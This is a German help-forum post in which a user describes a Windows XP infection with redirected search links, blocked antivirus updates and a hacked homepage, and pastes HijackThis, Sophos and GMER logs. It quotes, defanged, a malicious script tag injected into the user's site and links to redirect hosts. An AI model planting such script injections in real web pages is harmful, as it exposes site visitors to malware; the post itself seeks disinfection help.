| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehacktWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
| |
25.06.2010, 20:42
| #1 | |
 |  Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt Hallo, Nach einem Problem mit XP und der Systemreparatur funktionierte das automatische Update von Avira nicht mehr. Nach einem Scan mit Avira habe ich einige Dateien gelöscht, was aber keine Folgen hatte. Ich hab dann NOD32 draufgetan, aber auch hier funktioniert das Update nicht. Ein Scan mit der veralteten Signatur brachte nichts. Das Windows Update scheint noch zu funktionieren. Dabei habe ich aber gemerkt, daß ich viele Antivirus Webseiten nicht mehr aufrufen kann, egal ob mit Opera9 oder IE7. Es kommen unverständliche Fehlermeldungen: Zitat:
Windows-Dateischutz konnte eine Überprüfung der Systemdateien nicht initialisieren. Der spezifische Fehlercode ist 0x000006ba [Der RPC-Server ist nicht verfügbar.]. Außerdem werden Links in Opera abgeändert, vor allem in Google und ebay. Ziel sind dann Werbeseiten oder so Seiten wie Code:
ATTFilter hxxp:// ///www.safe-monitoring.in/sx1/404.php
hxxp:// ///www.safe-monitoring-2.in/sx1/voli9x1.php?ID=20677&fb=....
HijackThis mit Auswertung auf der Webseite brachte nichts eindeutiges nur 2 Fragezeichen. Malwarebytes startet, verschwindet aber nach ein paar Sekunden, OTH hat nicht geholfen. Bei Sophos Anti-Rootkit startet die GUI nicht, ich konnte aber über die Konsole einen Scan machen. Gmer ging mal, aber es wurde manchmal das System runtergefahren. Aktuell führt GMER zu einem Bluescreen. WinSCP führt zu vollständiger Systemauslastung und läßt sich dann auch nicht vollständig beenden (Prozeß bleibt aktiv). Auf meiner Homepage wurde folgender Code untergebracht: Code:
ATTFilter <script src=hxxp:/ /multiplemarketing.info/images/gifimg.php ></script>
Hier noch ein paar Logs, die aber schon ein paar Tage alt sind: HiJackThis: Code:
ATTFilter Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 21:17:58, on 20.06.2010 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.21256) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\Programme\Intel\Wireless\Bin\S24EvMon.exe C:\WINDOWS\system32\spoolsv.exe C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe C:\Programme\Intel\Wireless\Bin\EvtEng.exe C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe C:\Programme\Intel\Wireless\Bin\RegSrvc.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\igfxtray.exe C:\WINDOWS\system32\hkcmd.exe C:\Programme\Synaptics\SynTP\SynTPEnh.exe C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE C:\Programme\Panasonic\WSwitch\WSwitch.exe C:\Programme\Nero\Nero 7\InCD\NBHGui.exe C:\Programme\Nero\Nero 7\InCD\InCD.exe C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe C:\WINDOWS\system32\ctfmon.exe C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe C:\Programme\Sandboxie\SbieSvc.exe C:\Programme\Sandboxie\SbieCtrl.exe C:\Programme\Sandboxie\SandboxieRpcSs.exe C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\system32\taskmgr.exe C:\Programme\Trend Micro\HiJackThis\HiJackThis.exe C:\Programme\Opera\opera.exe C:\WINDOWS\system32\NOTEPAD.EXE R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=69157 O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe O4 - HKLM\..\Run: [SynTPLpr] C:\Programme\Synaptics\SynTP\SynTPLpr.exe O4 - HKLM\..\Run: [SynTPEnh] C:\Programme\Synaptics\SynTP\SynTPEnh.exe O4 - HKLM\..\Run: [IntelZeroConfig] "C:\Programme\Intel\Wireless\bin\ZCfgSvc.exe" O4 - HKLM\..\Run: [IntelWireless] "C:\Programme\Intel\Wireless\Bin\ifrmewrk.exe" /tf Intel PROSet/Wireless O4 - HKLM\..\Run: [Hotkey] C:\WINDOWS\system32\hkeyman.exe O4 - HKLM\..\Run: [Panasonic Hotkey Manager] C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE O4 - HKLM\..\Run: [WSwitch] C:\Programme\Panasonic\WSwitch\WSwitch.exe O4 - HKLM\..\Run: [PCinfo] C:\Programme\Panasonic\PCINFO\SetDiag.exe /FirstLogin O4 - HKLM\..\Run: [NeroFilterCheck] C:\Programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe O4 - HKLM\..\Run: [SecurDisc] C:\Programme\Nero\Nero 7\InCD\NBHGui.exe O4 - HKLM\..\Run: [InCD] C:\Programme\Nero\Nero 7\InCD\InCD.exe O4 - HKLM\..\Run: [VirtualCloneDrive] "C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe" /s O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programme\Adobe\Reader 9.0\Reader\Reader_sl.exe" O4 - HKLM\..\Run: [Adobe ARM] "C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe" O4 - HKLM\..\Run: [egui] "C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [SandboxieControl] "C:\Programme\Sandboxie\SbieCtrl.exe" O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe -hidden O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-20\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-20\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32 (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM') O4 - HKUS\S-1-5-18\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'SYSTEM') O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user') O4 - HKUS\.DEFAULT\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'Default user') O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1276015979588 O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1276015904580 O17 - HKLM\System\CCS\Services\Tcpip\..\{D9AE09D2-9DAE-46C5-93FE-0DC1FCBB848E}: NameServer = 217.0.43.161 217.0.43.177 O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll O23 - Service: ESET HTTP Server (EhttpSrv) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\EHttpSrv.exe O23 - Service: ESET Service (ekrn) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\EvtEng.exe O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe O23 - Service: NBService - Nero AG - C:\Programme\Nero\Nero 7\Nero BackItUp\NBService.exe O23 - Service: NMIndexingService - Nero AG - C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMIndexingService.exe O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe O23 - Service: Sandboxie Service (SbieSvc) - tzuk - C:\Programme\Sandboxie\SbieSvc.exe -- End of file - 8080 bytes Sophos: Code:
ATTFilter Sophos Anti-Rootkit Version 1.5.0 (c) 2009 Sophos Plc
Started logging on 19.06.2010 at 23:00:57
User "***" on computer "TOUGHBOOK"
Windows version 5.1 SP 3.0 Service Pack 3 build 2600 SM=0x100 PT=0x1 Win32
Info: Starting process scan.
Info: Starting registry scan.
Hidden: registry item \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi9
Info: Starting disk scan of C: (NTFS).
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,690398%2FVergleich-1980-zu-2009-Wie-schwer-und-teuer-ist-1-Petabyte-Datenspeicher%2FLaufwerk%2FNews%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,676309%2FUSB-30-Die-wichtigsten-Infos-zum-neuen-Technologie-Standard-Update%2FTechnologie%2FWissen%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,654197%2FDer-PCGH-Rivatuner-Guide-Teil-1-Einrichtung-und-Grundlagen%2FGrafikkarte%2FBildergalerie%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,678008%2FWestern-Digital-Caviar-Green-WD20EADS-2-Terabyte-Festplatte-im-Kurztest%2FLaufwerk%2FTest%2Ffavicon.ico
Info: Starting disk scan of D: (FAT).
Stopped logging on 19.06.2010 at 23:59:28
Gmer: Code:
ATTFilter GMER 1.0.15.15281 - hxxp://www.gmer.net
Rootkit scan 2010-06-18 15:38:22
Windows 5.1.2600 Service Pack 3
Running: ins7dh0h.exe; Driver: C:\DOKUME~1\***\LOKALE~1\Temp\fwrdipod.sys
---- System - GMER 1.0.15 ----
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwAssignProcessToJobObject [0xEE16F610]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwDebugActiveProcess [0xEE16FC10]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwDuplicateObject [0xEE16F730]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwOpenProcess [0xEE16F4B0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwOpenThread [0xEE16F570]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwProtectVirtualMemory [0xEE16F6D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSetContextThread [0xEE16F690]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSetInformationThread [0xEE16F650]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSetSecurityObject [0xEE16F7D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSuspendProcess [0xEE16F510]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSuspendThread [0xEE16F590]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwTerminateProcess [0xEE16F4D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwTerminateThread [0xEE16F5D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwWriteVirtualMemory [0xEE16F750]
---- Kernel code sections - GMER 1.0.15 ----
.text win32k.sys!EngAcquireSemaphore + 20E2 BF8082E8 5 Bytes JMP 852964D0
.text win32k.sys!EngFreeUserMem + 5BD2 BF80EE6F 5 Bytes JMP 85296430
.text win32k.sys!EngMulDiv + 8195 BF872D39 5 Bytes JMP 85296610
.text win32k.sys!XLATEOBJ_iXlate + 405D BF878F07 5 Bytes JMP 85296750
.text win32k.sys!EngCreatePalette + 1C0 BF87EA6A 5 Bytes JMP 85296570
.text win32k.sys!EngAlphaBlend + 2998 BF8C3163 5 Bytes JMP 852966B0
.text win32k.sys!PATHOBJ_bCloseFigure + 19F1 BF8F97FA 5 Bytes JMP 852967F0
---- User code sections - GMER 1.0.15 ----
.text C:\WINDOWS\system32\igfxtray.exe[264] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10023DF4
.text C:\WINDOWS\system32\igfxtray.exe[264] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10023C3C
.text C:\WINDOWS\system32\igfxtray.exe[264] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10023E78
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10023AF0
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!send 71A14C27 5 Bytes JMP 10023264
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100227F8
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1002278C
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10023A9C
.text C:\WINDOWS\system32\hkcmd.exe[320] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10023DF4
.text C:\WINDOWS\system32\hkcmd.exe[320] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10023C3C
.text C:\WINDOWS\system32\hkcmd.exe[320] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10023E78
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10023AF0
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!send 71A14C27 5 Bytes JMP 10023264
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100227F8
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1002278C
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10023A9C
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Sandboxie\SbieSvc.exe[444] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Sandboxie\SbieSvc.exe[444] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\Explorer.EXE[612] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\Explorer.EXE[612] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\Explorer.EXE[612] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10023DF4
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10023C3C
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10023E78
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10023AF0
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!send 71A14C27 5 Bytes JMP 10023264
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100227F8
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1002278C
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10023A9C
.text C:\WINDOWS\system32\winlogon.exe[764] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\winlogon.exe[764] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\winlogon.exe[764] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
